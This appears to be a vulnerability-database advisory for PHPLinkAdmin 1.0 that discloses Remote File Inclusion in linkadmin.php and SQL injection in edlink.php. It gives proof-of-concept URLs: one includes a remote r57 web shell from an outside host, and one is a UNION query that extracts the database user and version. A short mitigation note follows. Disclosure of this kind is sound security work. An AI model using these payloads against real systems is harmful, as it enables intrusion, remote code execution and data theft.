vendor:
PHPLinkAdmin
by:
SirGod
6.4
CVSS
MEDIUM
Remote File Inclusion/SQL Injection
89
CWE
Product Name: PHPLinkAdmin
Affected Version From: PHPLinkAdmin 1.0
Affected Version To: PHPLinkAdmin 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:beerwin:phplinkadmin
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009
Beerwin’s PHPLinkAdmin 1.0 Remote File Inclusion/SQL Injection
PHPLinkAdmin 1.0 is vulnerable to Remote File Inclusion and SQL Injection. The vulnerable code is present in linkadmin.php and edlink.php respectively. The PoC for Remote File Inclusion is http://127.0.0.1/path/linkadmin.php?page=http://www.kortech.cn/bbs//skin/zero_vote/r57.txt? and for SQL Injection is http://127.0.0.1/path/edlink.php?linkid=-1' union all select 1,2,3,4,concat_ws(0x3a,user(),database(),version())'--
Mitigation:
Input validation should be done to prevent Remote File Inclusion and SQL Injection attacks.